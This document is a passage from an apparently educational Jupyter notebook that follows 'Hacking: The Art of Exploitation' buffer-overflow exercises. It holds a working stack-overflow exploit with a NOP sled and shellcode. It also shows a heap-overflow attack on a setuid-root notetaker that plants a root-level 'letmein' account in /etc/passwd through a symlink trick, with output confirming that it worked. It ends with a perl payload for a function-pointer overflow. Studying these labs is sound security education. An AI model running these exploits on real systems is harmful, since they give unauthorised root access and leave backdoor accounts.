   unsigned int i, *ptr, ret, offset=224;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch.exe \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}



In [76]:
# let's compile the exploit code
# if you know the exact offset; modify the value of offset and compile
# if not don't worry about it, you can try and guess!
! ./compile.sh booksrc/exploit_notesearch.c exploit_notesearch.exe

#### run the exploit
- run the exploit_notesearch.exe from the terminal
- use wrapper bash script booksrc/exploit_notesearch.sh to try different offset

```bash
$ ./exploit_notesearch.exe
$ bash exploit_notesearch.sh
```
- change the range if you still do not get the shell

## Heap Overflow
- buffer overflow can happen in other segments such as **heap**, **data** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
- not standarized as stack overflow but can be just as effective

### booksrc/notetaker.c is susceptible to heap overflow
```strcpy(buffer, argv[1]); // problem!
```

In [78]:
! cat booksrc/notetaker.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // a function for fatal errors
void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper

int main(int argc, char *argv[]) {
   int userid, fd; // file descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't commandline arguments
      usage(argv[0], datafile); // display usage message and exit

   strcpy(buffer, argv[1]);  // copy into buffer

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

 // Opening the file
   fd = open(datafile, O_WRONLY|O_CR

In [79]:
# let's compile notetaker.c
! ./compile.sh ./booksrc/notetaker.c notetaker.exe

[01m[K./booksrc/notetaker.c:[m[K In function ‘[01m[Kmain[m[K’:
   38 |    userid = [01;35m[Kgetuid[m[K(); // get the real user ID
      |             [01;35m[K^~~~~~[m[K
   41 |    if([01;35m[Kwrite[m[K(fd, &userid, 4) == -1) // write user ID before note data
      |       [01;35m[K^~~~~[m[K
      |       [32m[Kfwrite[m[K
   50 |    if([01;35m[Kclose[m[K(fd) == -1)
      |       [01;35m[K^~~~~[m[K
      |       [32m[Kpclose[m[K


### notetaker.exe must be setuid root program 
- all users in the system can take their own notes by writing to /var/notes file

```bash
$ sudo chown root:root notetaker.exe
$ sudo chmod u+s notetaker.exe
```

In [80]:
%%bash
ls -al ./notetaker.exe

-rwsr-sr-x 1 root root 19248 Apr 29 13:14 ./notetaker.exe


In [81]:
%%bash
./notetaker.exe "new note for user"

[DEBUG] buffer   @ 0x804d1a0: 'new note for user'
[DEBUG] datafile @ 0x804d210: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.


## overflowing buffer by corrupting datafile
- how far down is datafile from buffer (the offset)
- see source code and try to guess
- use gdb; subtract the address of buffer from the address of datafile

In [84]:
%%bash
./notetaker.exe $(perl -e 'print "A"x112')
# make datafile empty!

[DEBUG] buffer   @ 0x804d1a0: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] datafile @ 0x804d210: ''


[!!] Fatal Error in main() while opening file: No such file or directory


CalledProcessError: Command 'b'./notetaker.exe $(perl -e \'print "A"x112\')\n# make datafile empty!\n'' returned non-zero exit status 255.

In [88]:
# let's make sure testfile doesn't exist in the current director
! ls -al testfile

-rw------- 1 root root 126 Apr 29 13:25 testfile


In [85]:
%%bash
# let's create testfile and write the data sent as an argument
./notetaker.exe $(perl -e 'print "A"x112 . "testfile"')

double free or corruption (out)
bash: line 2:  4315 Aborted                 ./notetaker.exe $(perl -e 'print "A"x112 . "testfile"')


CalledProcessError: Command 'b'# let\'s create testfile and write the data sent as an argument\n./notetaker.exe $(perl -e \'print "A"x112 . "testfile"\')\n'' returned non-zero exit status 134.

In [86]:
%%bash
ls -al testfile

-rw------- 1 root root 126 Apr 29 13:25 testfile


In [87]:
%%bash
cat testfile

cat: testfile: Permission denied


CalledProcessError: Command 'b'cat testfile\n'' returned non-zero exit status 1.

## Exploit the heap-overflow flaw in notetaker program
- several clever ways to exploit this type of capability
- append a user to the /etc/passwd file?
- make a backup copy of the file just incase...

In [89]:
%%bash
cp /etc/passwd /tmp/passwd.bkup

In [90]:
%%bash
cat /tmp/passwd.bkup

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/u

## /etc/passwd file format

username:password:userid:groupid:User Info:home folder:default shell
- x : hashed password stored in /etc/shadow file
- the password field can contain hashed password
- Perl crypt() function uses same function used by system to hash password

In [91]:
%%bash
perl -e 'print crypt("password", "AA")'

AA6tQYSfGxd/A

In [92]:
%%bash
perl -e 'print crypt("password", "XX")'

XXq2wKiyI43A2

## goal: genarate a entry that looks like

`letmein:XXq2wKiyI43A2:0:0:me:/root:/bin/bash`

### problem:
- it's hard to generate the exact line ending with /bin/bash
    - the file name /etc/passwd will be automatically attached at the end

### workaround:
- make /etc/passwd a soft link pointing to /bin/bash

In [94]:
%%bash
mkdir /tmp/etc
ln -s /bin/bash /tmp/etc/passwd

In [95]:
%%bash
ls -l /tmp/etc/passwd

lrwxrwxrwx 1 user user 9 Apr 29 13:38 /tmp/etc/passwd -> /bin/bash


### now we've a valid password entry that looks like:

`letmein:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd`

#### one more thing:
- the value just before /etc/passwd must be 112 bytes long, remember?
- can play with user information column to adjust the length


In [96]:
%%bash
# find the length with empty user info
echo -ne letmein:XXq2wKiyI43A2:0:0::/root:/tmp | wc -c

37


In [97]:
%%bash
echo $((112-37))

75


In [98]:
%%bash
perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp"' | wc -c

112


In [99]:
%%bash
./notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')

munmap_chunk(): invalid pointer
bash: line 1:  4615 Aborted                 ./notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')


CalledProcessError: Command 'b'./notetaker.exe $(perl -e \'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"\')\n'' returned non-zero exit status 134.

In [100]:
%%bash
tail /etc/passwd

colord:x:129:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:130:138::/var/lib/geoclue:/usr/sbin/nologin
king-phisher:x:131:139::/var/lib/king-phisher:/usr/sbin/nologin
Debian-gdm:x:132:140:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user,12,,:/home/user:/bin/bash
tom:x:1001:1001:tom,123,456,:/home/tom:/bin/bash
jerry:x:1002:1002:jerry,788,454,:/home/jerry:/bin/bash
�  
letmein:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd


## now login or su letmein with password

## BSS Segment, Function Pointer Overflow
### Game of Chance program
- three different game functions
    - uses a single global function pointer to remember last game played
- uses global struct object in BSS segment to hold plyayer's info
- seteuid multi-user program that stores user's data in /var folder

- compile game_of_chance.c
- change ownership to root:root
- seteuid
- run and play game
- player.name buffer is 100 bytes
- input_name() copies data to player.name until \n
- play_the_game function can take advantage of the overflown function pointer when any game is 
- put the game to background - ctrl+z
- find the difference between player.name address and player.current_game (100)
- return to the suspended program: fg
- enter 5 to change name
- change name to 100As+BBBB+\n
- play the same game and see the DEBUG
- find valid address to overwrite current_game func ptr
- list symbols in object/binary (nm)
    - nm game_of_chance.exe
- automate/simulate the game play
- $ perl -e 'print "1\n10\nn\n5\n" . "A"x100 . "jackpot address in rev order" . "1\n" . "y\n"x10 . 
"n\n5\nJohn Doe\n7"' | ./game_of_chance